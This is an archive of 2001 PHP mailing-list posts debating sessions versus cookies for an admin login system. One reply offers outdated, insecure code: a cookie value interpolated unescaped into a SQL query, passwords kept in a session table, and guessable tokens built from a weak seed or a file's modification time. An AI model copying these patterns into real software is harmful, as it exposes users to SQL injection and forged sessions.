(username, (password if needed,) logintime, expirytime, magickey)
VALUES
('$uname', ('$pass',) Date(U), Date(U)+$sessiontime, '$magickey')
Every page in the admin area should check the cookie:
SELECT * FROM sessions WHERE magickey = '$yourcookievalue'
Ensure that epxirytime is not less than date(U)
If those checks fail, redirect them to the login page and Exit().
If the user logs out and you're storing passwords, ensure you delete the
password with an UPDATE command or else someone breaking into your system
will have just found all your admin passwords. You might want to run a
script on a crontab to do that as well.
As a slightly more kludgy alternative, take the md5() of the last
modification time of a file somewhere:
?
$lastmod = filemtime(/path/to/your/admin/page/index.php);
$checkvalue = md5($lastmod);
?
And set $checkvalue as your cookie. Every subsequent page should then
perform the same check and if it fails, redirect as above and Exit().
Hope this helps somewhat.
Jason
--
Jason Murray
[EMAIL PROTECTED]
Web Developer, Melbourne IT
What'll Scorpy use wormhole technology for?
'Faster pizza delivery.'
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]
Re: [PHP] Sessions vs Cookies?
Chris Anderson pressed the little lettered thingies in this order... I am about to write a new admin system for a website I do and it will have many different logins. I was wondering overall which most of you thought would be better for such a thing? Wants really a pro about sessions over cookies? PHP sessions actually are cookies in most cases, but will revert to sending an ID tag in the URL if the user has cookies disabled (the ID tag does not need to be programmed into the URL, the PHP engine inserts it automatically). Use sessions. Period. If you design your own cookie solution, it won't work for people who have disabled cookies. If you design your own ID tag in the URL system, you will have A LOT of extra typing to get the ID tag in every URL. If you design one that works for both, you've wasted a lot of time. If you use PHP's sessions, you let PHP do the work for you. Check out: http://www.php.net/manual/en/ref.session.php Christopher Ostmo a.k.a. [EMAIL PROTECTED] AppIdeas.com Meeting cutting edge dynamic web site needs For a good time, http://www.AppIdeas.com/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
Re: [PHP] Sessions vs Cookies?
As I understand it, PHP's session management uses cookies anyway unless they are turned off by the browser, in which case session info is attached to the URL. So I'd use sessions rather than cookies alone. Mick On Thu, 21 Jun 2001, Chris Anderson wrote: I am about to write a new admin system for a website I do and it will have many different logins. I was wondering overall which most of you thought would be better for such a thing? Wants really a pro about sessions over cookies? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
RE: [PHP] Sessions vs Cookies?
Jason Murray pressed the little lettered thingies in this order... I am about to write a new admin system for a website I do and it will have many different logins. I was wondering overall which most of you thought would be better for such a thing? Wants really a pro about sessions over cookies? If it's for an admin section, then you may as well use cookies. If the client doesn't want to use cookies they can't use their admin interface. :) I doubt they would have privacy issues with themselves anyway. If you're going to use cookies, hopefully you'll have a database system available (you said you'd have lots of different logins). So, create a session table: ID int username text password text (if required, maybe you won't need it again) logintime int expirytime int magickey text Generate a magic key as such: ? $randomseed = intval(ereg_replace([^0-9], , substr(Date(U).microtime(), 4, 10))); srand($randomseed); $newid = rand(1, 9); $magickey = md5($newid.$REMOTE_ADDR.time()); ? That's really a lot of coding to do when you consider that PHP does this (or something very similar) for you when it initializes your user session. It really would be foolish to attempt to create new session tracking code if you use PHP4. Allow PHP to initialize the session, assign the variable, attempt to set the cookie and place the session ID onto the URL tag if it can't read the cookie. All that you have to do as the programmer is insert the session ID (which PHP has generated) into a database and possibly match it up with a valid login in that database entry. Doing the session coding yourself is a waste of time. You're not likely to find a more reliable session tracking solution than what's built into PHP4 as long as HTTP connections remain stateless. Christopher Ostmo a.k.a. [EMAIL PROTECTED] AppIdeas.com Meeting cutting edge dynamic web site needs For a good time, http://www.AppIdeas.com/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
[PHP] Sessions vs Cookies?
I am about to write a new admin system for a website I do and it will have many different logins. I was wondering overall which most of you thought would be better for such a thing? Wants really a pro about sessions over cookies?
[PHP] sessions and cookies
I am using sessions to password protect a section of a website. I am storing the session ID in a cookie but just in case cookies are not enabled, I am also passing the session ID in the query string to each page in the protected directory. Please can someone tell me if this could cause any problems, especially if the user if tries to access a URL from their history bar in the browser with an old session ID. i think what I'm trying to ask is , if the script receives a session ID from a query string and cookie, which does it use ? Thanks, David. --- Fed202 Solutions www.fed202solutions.com Mobile : 07779 293368 --- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
Re: [PHP] sessions and cookies
I don't recommend putting the Session ID in the URL. Subscibed members could pass URL's to eachother and that way they could have eachother's settings. ""David Hynes"" [EMAIL PROTECTED] wrote in message [EMAIL PROTECTED]">news:[EMAIL PROTECTED]... I am using sessions to password protect a section of a website. I am storing the session ID in a cookie but just in case cookies are not enabled, I am also passing the session ID in the query string to each page in the protected directory. Please can someone tell me if this could cause any problems, especially if the user if tries to access a URL from their history bar in the browser with an old session ID. i think what I'm trying to ask is , if the script receives a session ID from a query string and cookie, which does it use ? Thanks, David. --- Fed202 Solutions www.fed202solutions.com Mobile : 07779 293368 --- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
[PHP] sessions without cookies?
Hi, can someone point me toward a tutorial that shows how to register info (e.g. username, login status, and user preferences) and do this in a session without using cookies... is this even possible? thanks! duirfire -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
Re: [PHP] sessions without cookies?
You can use URL mode for PHP4 session if you want session w/o cookie. How about read this link? http://www.zend.com/zend/tut/session.php -- Yasuo Ohgaki "duirfire" [EMAIL PROTECTED] wrote in message [EMAIL PROTECTED]">news:[EMAIL PROTECTED]... Hi, can someone point me toward a tutorial that shows how to register info (e.g. username, login status, and user preferences) and do this in a session without using cookies... is this even possible? thanks! duirfire -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
[PHP] Sessions, no cookies, enable-trans-sids, no success
I'm using 4.04pl1 with --enable-trans-sids configured. I did the make distclean that some people suggest in the annotated manual. The relative URLs in forms and anchor are not getting the session id appended (neither are the absolutes in header/Location, but I understand that a current limitation). What else do I need to do? Eric Nielsen -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
